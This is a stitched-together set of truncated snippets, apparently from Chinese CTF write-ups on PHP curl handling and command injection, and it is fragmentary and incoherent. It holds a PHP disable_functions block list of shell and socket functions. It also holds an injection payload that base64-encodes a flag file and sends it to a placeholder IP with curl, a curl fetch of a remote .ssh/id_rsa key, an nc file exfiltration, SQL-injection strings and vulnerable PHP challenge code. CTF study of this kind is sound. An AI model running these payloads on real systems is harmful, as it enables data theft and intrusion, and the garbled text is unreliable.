disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_...
curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($httpCode == 404) { return 404; } curl_close($ch); return $output; } public function getBlogContents () { r...
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $co = curl_exec($ch); curl_close($ch); echo $co; } } highlight_file(__FILE__); curl($_GET...
看几条linux命令 data=$(cat x.txt); 相当于创建了值为x.txt内容的一个变量,用$data可引用该变量,通过管道符 | 和 base64 命令,可将目标base64编码,curl 可访问目标url,这会在目标服务器留下日志。 所以构造 cmd=data=$(cat flag233.php | base64);curl http://xx.xx.xx.xx/?data=$data; 对该...
curl http://192.168.x.x:31337/.ssh/id_rsa //查看某个路径下文件获取信息 三、利用80或者其他端口登录到一个web后 1、查看源码(f12) 2、有登录界面 (1)判断是否存在sql注入(通过(‘ or 1=1 --+)万能公式),存在跑sqlmap 1)利用kali攻击机 ...
代码里面的 setcookie('auth','tcp tunnel is forbidden!');告诉我们TCP被禁止不能用curl,而且cmd命令执行之后也没有回显,但是前面的注释告诉了我们flag文件,我们可以直接用nc命令把flag文件下过来,我们需要一台有公网ip的服务器。 在服务器上运行 ...
$res = curl_exec( $curl ); //$info = curl_getinfo($ch); curl_close( $curl ); return $res; } $data = array( 'data' => 'Test time' ); $rs = _httpPost( 'http://34.85.27.91:10080/', $data ); echo $rs; 随机数的种子可以获取,因此对rand函数结果产生的的随机数就可以在本地...
$result = curl_exec($ch); $arr = json_decode($result,true); if(!array_key_exists('attack',$arr)$arr['attack']>0) die('error!'); if(preg_match('/from@information_schema\./is',$payload)) die('hacker?'); $sql = "mysql -u*** -p*** -e ".escapeshellarg($sqlque.$payload...
$output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($httpCode == 404) { return 404; } curl_close($ch); return $output; } public function getBlogContents () { return $this->get($this->blog); ...
利用curl命令查看其内容。 发现secre3t.php文件。内容如下。 代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")...